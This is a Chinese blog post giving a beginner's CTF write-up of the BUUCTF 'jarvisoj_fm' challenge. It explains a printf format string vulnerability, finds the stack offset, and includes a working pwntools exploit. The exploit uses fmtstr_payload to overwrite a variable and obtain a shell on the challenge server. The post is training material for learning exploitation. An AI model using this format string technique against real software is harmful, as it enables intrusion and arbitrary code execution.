jarvisoj_fm

于 2023-05-20 16:42:27 发布
阅读量749 收藏 1
点赞数 1
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/130782779
版权

小白做题垃圾笔记,不建议阅读。

1.32位操作系统,有canary,和NX ,本来以为是绕过canary呢。

 

2.第12行,如果x==4就执行/bin/sh

,第10行存在格式化字符串漏洞。

是格式化字符串漏洞,对任意地址内容更改。

3.确定偏移:

pwngdb

复制aaaa所在地址。

 fmtarg  aaaa的地址

偏移为%11$p

 

4.核心payload

如果用原始方法,就是发送p32(0x0804A02C)+p32(b'%11$p')

发送这段什么意思呢?

就是前边是一个地址,它是变量x的地址,后边是%11$n

%$n的作用就是将前边的字节长度赋值给后边的地址

回头看发送的数据,地址对应偏移是11$也就是说是第十一个,那么,%11$n就会将输入的地址里的内容改为前边的长度。输入的地址是x的地址,而前边的长度是p32      4个字节。也就是4

pwntools有个函数是

fmtstr_payload(offset,writes,numbwritten=0,write_size='byte')

其中,第一个参数是偏移,也就是输入的内容得偏移,第二个是改写的内存以及内容。

格式是这样的{addr:value,addr2:value2……},addr是要改写的而地址,value是值。有的时候会写{:printf_got}

numbwritten是已经由printf写入的字节数,(可选)

write_size:必须是byte、short、int   用于指定逐byte还是逐short或者逐int写(hhn、hn、n)。(可选)

它可以用来生成一段payload。

还有一个函数是FmtStr但是我还没有深入研究。

5.

exp如下:

from pwn import *

debug=0
if debug:
    p=process('./fm')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    gdb.attach(p)
else:
    p=remote('node4.buuoj.cn',29181)

def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)

x_add=0x0804A02C


offset=11

payload=fmtstr_payload(11,{x_add:4},write_size='int')

se(payload)

p.interactive()

#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"
#write_add=u32(p.recv(4))

#addr=u32(r.recvuntil('\xf7')[-4:])
#puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
#sa(b'wish!\n', b'%11$p')
#rl(b'0x')
#canary = int(p.recv(16), 16)

y6y6y666
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF:jarvisoj_fm(write up)
qq_44768749的博客
08-24 320
BUUCTF:jarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、canary以及部分RELRO保护 0x02 运行 运行未发现什么异常,但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单,关键部分都在主函数中,有getshell的函数,当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3,需要利用格式化字符串漏洞改写x的值 测试格式
STM32F103_FM17550.rar
11-12
FM17550是一款通用串行接口芯片,常用于实现串行通信,如RS-485或RS-422,以满足长距离、多节点的通信需求。 在这个项目中,STM32F103与FM17550结合使用,实现了对RF A卡和B卡的读写操作。RF卡(Radio Frequency ...
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 214
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 224
BUUCTF 做题练习
【CTF】jarvisoj_fm 1
凉水的博客
07-06 531
jarvisoj_fm
JarvisOJ fm
PLpa的博客
07-09 1063
这一题是一道格式化字符串漏洞题 关于格式化漏洞的基础,你可以看我前面的博客,里面有提到:https://blog.csdn.net/qq_43986365/article/details/94896862 拿到这一题,我们仍然是先查看保护: 我们可以看到,简单的格式化漏洞题只开了NX和CANARY保护,好的。 接下来我们就可以进入IDA中看一下程序的具体逻辑: 在这里,我们可以看到有一个明显的...
FM.zip_FM_FM matlab
09-23
标题中的"FM.zip_FM_FM matlab"表明这是一个与调频(FM)技术相关的MATLAB项目压缩包。MATLAB是一种广泛用于数值计算、符号计算、数据可视化和建模的高级编程环境,尤其在信号处理和通信领域中应用广泛。在这个项目...
FM.rar_FM_FM modulation_modulation
07-15
标题中的"FM.rar_FM_FM modulation_modulation"暗示了我们讨论的主题是关于调频(Frequency Modulation,简称FM)技术,特别是在MATLAB环境下的模拟。MATLAB是一个强大的数学计算软件,常用于信号处理、通信系统建模...
FM-test.rar_FM_fm test
09-23
标题中的"FM-test.rar_FM_fm test"提示我们这是一个与FM广播相关的项目,可能是一个软件或固件开发的压缩包。描述中提到的"TEA5767收音机程序"进一步确认了这一点,因为TEA5767是一款常用的数字调谐FM接收器集成电路...
FM.rar_FM_fm matlab_modulation
09-21
标题中的"FM.rar_FM_fm matlab_modulation"表明这是一个与调频(FM)技术相关的MATLAB代码压缩包。MATLAB是一种强大的编程环境,常用于数值计算、数据分析以及信号处理等领域,包括模拟和分析调频系统。 描述中的...
jarvisoj_fm[FmtStr]
、moddemod
06-26 272
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './fm' p = process(proc_na.
BUUCTF-jarvisoj_fm1-WP
Rt1Text的博客
10-30 259
有canary ,题目提升fm,考虑格式化字符串。
[BUUCTF-pwn]——jarvisoj_fm
Y_peak的博客
02-22 161
[BUUCTF-pwn]—— 题目地址: https://buuoj.cn/challenges#jarvisoj_fm 点击一下writeup 在这里 以前写过所以偷懒一下, 嘿嘿嘿!!! 各位师傅不要见怪呀 ????
[BUUCTF]PWN——jarvisoj_fm
BangSen1的博客
03-19 325
jarvisoj_fm 例行检查,开启NX和CANARY保护,32位。 运行程序 IDA载入,检索字符串,看见了“/bin/sh”字符串 跟进函数,当x=4的时候执行system(/bin/sh) 存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 payload=p32(x_addr)+"%11$n" 首先传入x参数的地址,这个地址存放在栈上偏移为11的位置,利用%11$n,定位到了偏移为11的位置,往这个位置写入数据,写
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 389
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解题思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
login_window_fm
最新发布
07-13
您提到的 "login_window_fm" 可能是指登录窗口的相关代码。以下是一个简单的使用Python和Tkinter库创建登录窗口的示例: ```python from tkinter import * def login(): username = entry_username.get() ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值